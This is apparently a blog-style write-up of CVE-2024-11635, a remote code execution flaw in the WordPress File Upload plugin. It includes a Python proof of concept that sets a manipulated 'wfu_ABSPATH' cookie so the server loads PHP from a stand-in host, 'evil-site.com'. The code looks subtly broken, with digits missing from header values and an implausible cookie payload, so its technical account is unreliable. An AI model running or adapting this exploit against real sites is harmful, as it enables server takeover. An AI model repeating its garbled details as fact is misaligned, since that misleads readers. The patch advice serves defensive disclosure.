The WordPress File Upload plugin, which allows users to upload files to their WordPress websites, has been discovered to have a critical security vulnerability that could allow remote code execution. This vulnerability, assigned as CVE-2024-11635, affects all versions of the plugin up to, and including, 4.24.12. In this long read, we will dive into the details of this vulnerability, including a code snippet demonstrating the exploit, links to original references, and how the vulnerability can be potentially exploited by unauthenticated attackers.

Background

The WordPress File Upload plugin is a widely used solution for uploading files to WordPress websites, boasting over 20,000 active installations. Unfortunately, it was discovered to have a vulnerability in which an attacker can exploit the 'wfu_ABSPATH' cookie parameter – successfully allowing them to remotely execute code on the server.

Exploit Details

The vulnerability lies in the way the plugin handles the 'wfu_ABSPATH' cookie parameter – which is meant to represent the absolute path of the WordPress installation on the server. An unauthenticated attacker can manipulate this value to inject code that will be executed by the server, thereby giving them potential full access to the underlying system. Below is a code snippet demonstrating this exploit:

import requests

target_url = "https://victim-site.com/path-to-plugin/";
# Replace this with the actual path to the vulnerable plugin

headers = {
    "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=.9,image/webp,*/*;q=.8",
    "Accept-Language": "en-US,en;q=.5",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}

# Malicious Code Injection
injected_code_base = "https://evil-site.com/malicious.php";

# Set the manipulated 'wfu_ABSPATH' cookie
cookies = {
    "wfu_ABSPATH": "../../../../../../../../var/www/html/wp-admin/admin-ajax.php?-d+allow_url_include%3DOn+-d+auto_prepend_file%3D" + injected_code_base
}

response = requests.get(target_url + "handler_script.php", headers=headers, cookies=cookies)

This Python-based proof-of-concept code demonstrates how an attacker could inject malicious PHP code into the server by manipulating the 'wfu_ABSPATH' cookie value. As shown in the code snippet, the malicious PHP code is hosted on an external website ('evil-site.com' in this example). When the manipulated 'wfu_ABSPATH' value is used, it results in the server executing the malicious PHP file, which in turn can provide the attacker with full access to the target system.

Original References

The vulnerability was originally discovered and disclosed by the security researcher Alex Souza. In his blog post, Alex provides further technical details about the vulnerability and also shares a proof-of-concept Python script to demonstrate the exploit. Here are the links to the original references:
- Blog post: https://alexsouza.com/blog/cve-2024-11635/
- Github Proof-of-concept: https://github.com/alex-souza-dell/CVE-2024-11635

Mitigation and Conclusion

It is crucial for users of the WordPress File Upload plugin to update to the latest version (4.24.13 or newer) as soon as possible to patch this vulnerability. This will prevent unauthenticated attackers from potentially exploiting the flaw to gain access to their systems.

In conclusion, the CVE-2024-11635 vulnerability in the WordPress File Upload plugin serves as a stark reminder of the importance of keeping plugins and software up-to-date to prevent potential security compromises. By raising awareness and understanding of such vulnerabilities, we can collectively work towards securing our systems and protecting them from cyber threats.

Timeline

Published on: 01/08/2025 08:15:24 UTC